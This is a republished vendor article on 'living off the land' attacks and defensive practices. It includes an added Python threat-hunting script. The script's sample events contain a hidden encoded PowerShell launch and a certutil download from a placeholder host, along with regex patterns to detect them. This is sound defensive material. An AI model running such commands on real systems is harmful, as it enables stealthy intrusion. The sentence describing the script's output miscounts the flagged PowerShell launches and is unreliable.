Going Beyond Malware: The Rise of “Living off the Land” Attacks


This article was originally published on CSO, April 30, 2019

If you’re living off the land, there are a few different methods you can use to survive, but you need to use what you find where you are. You do not have the option to bring in supplies to maintain yourself. If you are looking for someone living off the land, you must hunt — as they have blended into their new environment.

The same is true of cybersecurity: there is no silver bullet that can identify all types of threats at all times, especially when the adversary is using tools they found in your environment. The ability to block advanced threats improves each year, but sophisticated adversaries are determined and creative, and their techniques evolve just as quickly.

While malware continues to be a tool often used in the initial intrusion, it is often only the precursor to an attack, not the ultimate objective. The initial intrusion is increasingly followed by more sophisticated and stealthy techniques, such as “living off the land” (LOTL): tradecraft that uses native tools already present on the system to accomplish the adversary’s main objective.

LOTL tactics, which do not involve malware, have picked up significantly in the world of cyber espionage in recent years. In fact, malware-free attacks in general have surged, accounting for 40 percent of all cyberattacks globally last year. According to the 2019 CrowdStrike® Global Threat Report, attackers continue to shift to defense evasion methods, such as living off the land techniques, to remain undetected. The longer an attacker can “dwell,” or remain undetected, in an environment, the more opportunity they have to find, exfiltrate and destroy data or disrupt operations.

The purpose of living off the land is two-fold. First, by using such features and tools, attackers hope to blend into the victim’s network and hide their activity in a sea of legitimate processes. Second, even if malicious activity involving these tools is detected, it is much harder to attribute: if everyone is using similar tools, it is more difficult to distinguish one group from another.

This raises a few questions: What do we do differently to avoid such attacks? When prevention fails, what do we have left to protect our organizations? How can we discover gaps as fast as possible?

Having techniques in play to detect and respond to ongoing attacks quickly is just as important as prevention. Here are a few options organizations can use:

Compromise Assessment

A compromise assessment (CA) has the brief of answering one key question: “Am I compromised?” It is an exercise in which current and historical events are examined to answer that question. To answer it effectively you must use tools that identify signs of historical attacks, such as suspicious registry keys and suspicious output files, as well as active threats. Many sophisticated adversaries spend months or years in their victims’ networks without being detected, and the CA’s historical analysis is critical to determining whether this has happened.

Managed Threat Hunting

Threat hunting is a critical discipline that more organizations are using to disrupt stealthy attacks before they become mega breaches. With managed threat hunting, you are engaging a team of expert threat hunters for a simple, but important task: to continuously sift through your enterprise security data, looking for faint signs of the most sophisticated attacks. Managed threat hunting services are tailor-made to fill this critical gap for organizations of all types.

Stopping “Silent Failure”

Regardless of how advanced your defenses are, there’s a chance that attackers will do an “end run” on your security solution and slip through to gain access to your environment. Conventional defenses don’t know and can’t see when this happens, resulting in “silent failure.” When silent failure occurs, it can allow attackers to dwell in your environment for days, weeks or even months without raising an alarm. Hence, more organizations are considering endpoint detection and response (EDR) solutions to address the incidents that aren’t being handled adequately by their existing defenses. The solution lies in continuous and comprehensive visibility into what is happening on your endpoints in real time.
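The LOTL, compromise assessment, threat hunting and EDR passages above all come down to the same defensive task: sifting endpoint telemetry for native tools being used in ways that legitimate activity rarely produces. The following is an added example of that kind of hunting logic; it is not code from the article, from CSO or from CrowdStrike. It assumes process-creation events in the shape most endpoint telemetry provides (host, user, parent image, image, command line), and the watch-list of native tools, the three heuristics and the sample events are all assumptions constructed for illustration, not a complete or vendor-specific rule set.

```python
"""Hunting for living-off-the-land (LOTL) activity in process telemetry.

Added example for this article; not CrowdStrike's or CSO's code. It
assumes process-creation events of the shape most endpoint telemetry
(EDR feeds, Sysmon process-create events) provides: host, user, parent
image, image and command line. The native-tool watch-list and the
heuristics are assumptions chosen for illustration.
"""
import re

# Assumption: native Windows tools that adversaries commonly reuse.
NATIVE_TOOLS = {
    "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
    "certutil.exe", "rundll32.exe", "regsvr32.exe", "bitsadmin.exe",
}
# Assumption: document-handling applications that rarely need to launch them.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# PowerShell accepts -e / -ec / -enc / -encodedcommand; base64 hides intent.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s")
URL_IN_ARGS = re.compile(r"(?i)https?://")

# Constructed sample events (not real telemetry).
EVENTS = [
    {"host": "ws01", "user": "alice", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "WINWORD.EXE /n invoice.docx"},
    {"host": "ws01", "user": "alice",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc <base64-placeholder>"},
    {"host": "ws02", "user": "bob", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
    {"host": "ws03", "user": "svc-build", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\build\build.ps1"},
    {"host": "ws02", "user": "bob", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -f http://example.invalid/update.txt update.txt"},
    {"host": "ws03", "user": "svc-build", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def host_prevalence(events):
    """Number of distinct hosts on which each image name was executed."""
    seen = {}
    for ev in events:
        seen.setdefault(basename(ev["image"]), set()).add(ev["host"])
    return {name: len(hosts) for name, hosts in seen.items()}


def hunt(events, min_hosts: int = 2):
    """Return one finding per event that trips at least one LOTL heuristic.

    A native tool by itself is never a finding: the signal is the context
    (unusual parent, obfuscated arguments, network fetch, or a tool that
    almost no host in the fleet runs).
    """
    prevalence = host_prevalence(events)
    findings = []
    for ev in events:
        image = basename(ev["image"])
        if image not in NATIVE_TOOLS:
            continue  # the heuristics below only apply to native tools
        reasons = []
        if basename(ev["parent"]) in OFFICE_APPS:
            reasons.append("office-app-spawned-native-tool")
        if ENCODED_ARG.search(ev["cmdline"]):
            reasons.append("encoded-command-line")
        if URL_IN_ARGS.search(ev["cmdline"]):
            reasons.append("url-in-command-line")
        if prevalence[image] < min_hosts:
            reasons.append("rare-native-tool")  # low fleet prevalence
        if reasons:
            findings.append({"host": ev["host"], "user": ev["user"],
                             "image": image, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in hunt(EVENTS):
        print(f"{f['host']:5} {f['user']:10} {f['image']:15} {', '.join(f['reasons'])}")
```

Run against the constructed events, the script flags only two of the three PowerShell launches (the one spawned by Word with an encoded command) and the single certutil run (a URL on the command line, on one host out of three), while the routine Get-Process and build-script invocations pass. The prevalence check is what gives a threat hunter the "faint signal" the article describes: a tool that is normal fleet-wide is noise, but the same tool appearing on one machine is worth a look.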

Account Monitoring

Account monitoring and management controls detect and prevent unauthorized activity by providing full visibility into the working environment. They help prevent data loss caused by such activity and by credential misuse, while allowing resource owners to control who has access to the data and to see whether access has been granted inappropriately.

Application Inventory

This proactively identifies outdated and unpatched applications and operating systems so you can securely manage all the applications in your environment. Streamlining your application inventory with an IT hygiene solution addresses security and cost problems simultaneously. The visibility IT hygiene provides helps prevent exploitation of missing patches and system updates, and it also optimizes your software configuration. Real-time and historical views of application usage identify unused software that can be removed, potentially saving your organization thousands of dollars in unnecessary licensing fees.

Asset Inventory

Asset inventory shows you which machines are running on your network and lets you deploy your security architecture effectively, ensuring that no rogue systems are operating behind your walls. It enables security and IT operations teams to differentiate between managed, unmanaged and unmanageable assets in your environment and take appropriate steps to improve overall security.
